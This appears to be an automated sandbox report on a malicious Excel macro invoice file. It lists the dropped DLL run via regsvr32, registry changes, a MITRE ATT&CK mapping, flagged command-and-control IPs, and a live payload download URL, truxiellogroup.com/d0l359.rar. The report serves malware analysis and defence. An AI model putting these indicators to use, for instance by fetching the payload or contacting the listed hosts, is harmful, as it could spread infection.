Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 77.220.64.37 187	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840			Jump to behavior

Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Process Injection112	Masquerading11	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting22	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol23	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INV2680371456-20210111889374.xlsm	47%	Virustotal		Browse
INV2680371456-20210111889374.xlsm	8%	Metadefender		Browse
INV2680371456-20210111889374.xlsm	32%	ReversingLabs	Script-Macro.Trojan.Remcos

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\aymakjne.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar	38%	ReversingLabs	Win32.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\aymakjne.dll	38%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cdn.digicertcdn.com	0%	Virustotal		Browse
truxiellogroup.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://80.86.91.27/	5%	Virustotal		Browse
https://80.86.91.27/	0%	Avira URL Cloud	safe
https://77.220.64.37/	7%	Virustotal		Browse
https://77.220.64.37/	0%	Avira URL Cloud	safe
https://80.86.91.27/P	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://5.100.228.233/qM	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://80.86.91.27:3308/IB	0%	Avira URL Cloud	safe
https://46.105.131.65:1512/	0%	Avira URL Cloud	safe
https://46.105.131.65/f	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://80.86.91.27:3308/AB	0%	Avira URL Cloud	safe
https://46.105.131.65:1512/yB	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/aB	0%	Avira URL Cloud	safe
https://46.105.131.65/t	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://5.100.228.233:3389/YB	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://5.100.228.233/	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://truxiellogroup.com/d0l359.rar	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.digicertcdn.com	104.18.10.39	true	false	0%, Virustotal, Browse	unknown
truxiellogroup.com	68.65.122.35	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://truxiellogroup.com/d0l359.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	false		high
http://investor.msn.com	DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://80.86.91.27/	regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://77.220.64.37/	regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://80.86.91.27/P	regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241078237.0000000000236000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://5.100.228.233/qM	regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	false		high
https://80.86.91.27:3308/IB	regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.105.131.65:1512/	regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385480217.00000000031AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	false		high
https://46.105.131.65/f	regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://80.86.91.27:3308/AB	regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp	false		high
https://46.105.131.65:1512/yB	regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/aB	regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://46.105.131.65/t	regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://5.100.228.233:3389/YB	regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	false		high
https://5.100.228.233/	regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.2381929162.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382046788.00000000008F0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241857829.00000000022E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
5.100.228.233	unknown	Netherlands	8315	SENTIANL	true
80.86.91.27	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
46.105.131.65	unknown	France	16276	OVHFR	true
68.65.122.35	unknown	United States	22612	NAMECHEAP-NETUS	false
77.220.64.37	unknown	Italy	44160	INTERNETONEInternetServicesProviderIT	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338309
Start date:	12.01.2021
Start time:	01:42:56
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INV2680371456-20210111889374.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLSM@9/21@1/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1.4%) Quality average: 75.1% Quality standard deviation: 36.8%
HCA Information:	Successful, ratio: 71% Number of executed functions: 4 Number of non-executed functions: 4
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 205.185.216.42, 205.185.216.10, 13.88.21.125, 52.147.198.201, 104.18.10.39 Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:43:48	API Interceptor	1065x Sleep call for process: regsvr32.exe modified
01:44:05	API Interceptor	554x Sleep call for process: DWWIN.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
5.100.228.233	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
80.86.91.27	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
46.105.131.65	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
77.220.64.37	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xls	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	1-Total New Invoices Monday Dec 14 2020.xlsm	Get hash	malicious	Browse
	1 Total New Invoices-Monday December 14 2020.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Mal.EncPk-APV.3900.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.digicertcdn.com	sample20210111-01.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	104.18.11.39
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	104.18.10.39
	SurfsharkSetup.exe	Get hash	malicious	Browse	104.18.10.39
	https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1	Get hash	malicious	Browse	104.18.10.39
	ASHLEY NAIDOO CV.doc	Get hash	malicious	Browse	104.18.10.39
	RFQ.doc	Get hash	malicious	Browse	104.18.10.39
	SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe	Get hash	malicious	Browse	104.18.11.39
	http://test.kunmiskincare.com/index.php	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3D	Get hash	malicious	Browse	104.18.10.39
	https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3D	Get hash	malicious	Browse	104.18.10.39
